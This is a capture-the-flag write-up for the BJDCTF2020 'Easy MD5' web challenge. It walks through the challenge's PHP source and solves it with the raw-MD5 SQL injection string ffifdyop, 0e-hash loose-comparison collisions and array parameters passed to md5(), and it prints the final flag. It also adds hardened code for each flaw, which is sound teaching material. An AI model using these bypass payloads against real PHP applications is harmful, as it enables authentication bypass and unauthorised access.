BUUCTF WEB [BJDCTF2020]Easy MD5


Source code

leveldo.php

<?php
header('hint:select * from \'admin\' where password='.'md5($pass,true)');
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        @media all and (min-width:600px) {
            * {
                /* make width include border and padding */
                box-sizing: border-box;
            }

            body {
                /* center the page content horizontally and vertically */
                position: relative;
                display: flex;
                height: 550px;
                align-items: center;
                justify-content: center;
                background-size: cover;
                background-repeat: no-repeat;
            }

            /*container*/
            .container {
                border: rgba(240, 235, 235, 0.932) solid 3px;
                box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
                background-color: white;
                width: 30%;
                height: 20%;
                border-radius: 8px;
                position: relative;
            }

            /*container end*/

            /*header*/
            #header h1 {
                position: relative;
                text-align: center;
            }

            /*header end*/
            /*main*/
            .main {
                align-items: center;
                justify-content: center;
                position: relative;
                width: 100%;
                height: 100%;
            }

            .main section {
                width: 50%;
                margin-left: 22%;
            }

            .main section .upload {
                width: 400px;
            }

            .main section .upload .in{
                margin-top: 10%;
                border-radius:10px;
                font-size: 17px;
                color: rgba(44, 44, 44, 0.582);
                font-family: "Microsoft YaHei";
                border: rgba(240, 235, 235, 0.932) solid 3px;
                box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
                background-color: white;
            }

            .main section .upload .give{
                margin-left: 10px;
                border-radius:10px;
                color: rgba(44, 44, 44, 0.582);
                font-size: 17px;
                font-family: "Microsoft YaHei";
                border: white solid 3px;
                background-color: white;
            }

            /*main end*/
        }
    </style>
</head>

<body>
    <div class="container">
        <div id="header">
        </div><!-- /header end -->
        <div class="main">

            <section>
                <form class="upload" action="leveldo4.php" method="GET">
                    <input type="text" id="name" name='password' class="in">
                    <input type="submit" class="give">
                </form>
            </section>
        </div><!-- /main end -->

    </div><!-- /container end -->
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
</body>

</html>



<?php
error_reporting(0);
$password = $_GET['password'];

if($password == 'ffifdyop')
{
    echo "<script>window.location.replace('./levels91.php')</script>";
}

?>

levels91.php

<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
    header('Location: levell14.php');
-->

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        span {
            position: relative;
            display: flex;
            width: 100%;
            height: 700px;
            align-items: center;
            font-size: 70px;
            font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            justify-content: center;
        }
    </style>
</head>

<body>
    <span>Do You Like MD5?</span>
</body>

</html>

<?php
error_reporting(0);
$a = $_GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    echo "<script>window.location.replace('./levell14.php')</script>";
}
?>

levell14.php

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

flag.php

<?php

$flag = file_get_contents('/flag');

Analysis

Key code in leveldo.php

$password = $_GET['password'];

if($password == 'ffifdyop')
{
    echo "<script>window.location.replace('./levels91.php')</script>";
}

Enter ffifdyop in the text box and submit; the page redirects to levels91.php.
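The hint header in leveldo.php (select * from 'admin' where password='.md5($pass,true)') is what makes ffifdyop the intended password: md5() with the second argument set to true returns 16 raw digest bytes rather than a hex string, and the raw digest of ffifdyop begins with the bytes 'or'6, so splicing it into the query text turns it into SQL syntax. The following is an added example, not part of the original writeup or the challenge source. It shows the vulnerable concatenation next to a parameterised lookup; the table and column names and the PDO connection are assumptions.

```php
<?php
// Added example, not from the original writeup or the challenge.
// md5($s, true) returns the 16 raw digest bytes instead of a 32-character hex string,
// so interpolating it into SQL text lets digest bytes act as SQL syntax.

function raw_md5_sql(string $pass): string {
    // Vulnerable pattern from the hint header: raw digest bytes spliced into the query text.
    return "select * from admin where password='" . md5($pass, true) . "'";
}

function printable_prefix(string $raw, int $n): string {
    // Show the first $n bytes, replacing non-printable bytes with '.' so the output stays readable.
    $out = '';
    for ($i = 0; $i < $n && $i < strlen($raw); $i++) {
        $o = ord($raw[$i]);
        $out .= ($o >= 0x20 && $o <= 0x7e) ? $raw[$i] : '.';
    }
    return $out;
}

function lookup_admin_safe(PDO $db, string $pass): ?array {
    // Hardened: the hash is bound as a parameter, so its bytes can never become SQL syntax.
    // Table/column names are assumptions. Unsalted MD5 is still a poor password hash;
    // real code should use password_hash()/password_verify().
    $stmt = $db->prepare('SELECT * FROM admin WHERE password = :h');
    $stmt->execute([':h' => md5($pass)]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed input: the password the writeup submits.
$digest = md5('ffifdyop', true);
echo bin2hex($digest), "\n";                                 // the hex form of the raw digest
echo printable_prefix($digest, 8), "\n";                     // the leading bytes as they land in the SQL
echo printable_prefix(raw_md5_sql('ffifdyop'), 60), "\n";    // the resulting WHERE clause
```

The second line of output starts with 'or'6, so the generated clause reads password=''or'6...': the leading quote closes the empty literal, or is a keyword, and the remaining string literal starts with a digit, which MySQL treats as true. With the bound parameter in lookup_admin_safe the same bytes are just data.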

Key code in levels91.php

$a = $_GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    echo "<script>window.location.replace('./levell14.php')</script>";
}

This is a loose-type comparison bypass of two MD5 hashes.

md5("s1885207154a") => 0e509367213418206700842008763514
md5("s1836677006a") => 0e481036490867661113260034900752

Both of these strings hash to values beginning with 0e. When compared with ==, PHP treats such strings as numbers in scientific notation, so whatever follows the 0e, both evaluate to 0 and the comparison is true.

So we can construct the payload

/levels91.php?a=s1885207154a&b=s1836677006a
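As an added example (not code from the original writeup), the block below runs PHP's loose comparison over the two digests quoted above and puts the strict alternatives next to it. The two input strings and their digests are the ones the writeup lists; the function names are mine.

```php
<?php
// Added example, not from the original writeup.
// Digests of the two strings used in the writeup (values as listed there).
$h1 = md5('s1885207154a');   // 0e509367213418206700842008763514
$h2 = md5('s1836677006a');   // 0e481036490867661113260034900752

// Both digests are numeric strings in scientific notation ("0e..." => 0 * 10^N), so
// the loose == operator compares them as numbers and finds them equal.
var_dump($h1 == $h2);
// Identity requires the same type and the same bytes.
var_dump($h1 === $h2);
// hash_equals() compares bytes in constant time and never coerces to numbers.
var_dump(hash_equals($h1, $h2));

function md5_matches_loose(string $a, string $b): bool {
    // The check in levels91.php: vulnerable to the 0e pattern.
    return $a != $b && md5($a) == md5($b);
}

function md5_matches_strict(string $a, string $b): bool {
    // Hardened replacement: same semantics the author intended, no type juggling.
    return $a !== $b && hash_equals(md5($a), md5($b));
}

var_dump(md5_matches_loose('s1885207154a', 's1836677006a'));
var_dump(md5_matches_strict('s1885207154a', 's1836677006a'));
```

The first var_dump prints bool(true) on every PHP version, because two numeric strings compared with == are compared numerically; the === and hash_equals() variants are false. The string type declarations on the two functions also stop arrays from reaching md5(), which matters for the next level.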

This redirects to levell14.php

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

PHP has the following quirk:

md5([1,2,3]) == md5([4,5,6]) == NULL

So passing arrays bypasses this check

param1[]=1&param2[]=2
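The added example below (not code from the original writeup) reproduces the levell14.php check against a constructed $_POST array equivalent to param1[]=1&param2[]=2, and shows the type guard that closes the hole. On PHP 7 md5() of an array returns NULL with a warning (silenced by error_reporting(0)), so NULL === NULL passes while [1] !== [2] is true; on PHP 8 md5() throws a TypeError instead, which the block catches. The function names are mine.

```php
<?php
// Added example, not from the original writeup.

function flag_check_original(array $post): bool {
    // The check in levell14.php. On PHP 7, md5(array) returns NULL (plus a warning),
    // so two different arrays satisfy both conditions. On PHP 8, md5() throws TypeError.
    return $post['param1'] !== $post['param2']
        && @md5($post['param1']) === @md5($post['param2']);
}

function flag_check_hardened(array $post): bool {
    // Hardened: require both parameters to be present and to be strings before hashing,
    // then compare the digests in constant time. Arrays never reach md5().
    if (!isset($post['param1'], $post['param2'])
        || !is_string($post['param1']) || !is_string($post['param2'])) {
        return false;
    }
    return $post['param1'] !== $post['param2']
        && hash_equals(md5($post['param1']), md5($post['param2']));
}

// Constructed input: what PHP builds from the query string param1[]=1&param2[]=2.
$bypass = ['param1' => ['1'], 'param2' => ['2']];

try {
    var_dump(flag_check_original($bypass));   // PHP 7: the bypass succeeds
} catch (TypeError $e) {
    echo "PHP 8: md5() rejects arrays: ", $e->getMessage(), "\n";   // fails closed instead
}

var_dump(flag_check_hardened($bypass));       // rejected before hashing on any version
```

On PHP 7 the first call returns true, which is exactly the condition that echoes $flag; the hardened check returns false because the is_string() guard runs before md5(). Rejecting non-string input is the general fix for this class of bug: every PHP string function that returns NULL on a wrong type turns a strict === between two such results into a trivially satisfiable condition.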

This returns the flag

flag{808e87d7-e419-4fab-a9f4-007d229b4c0f}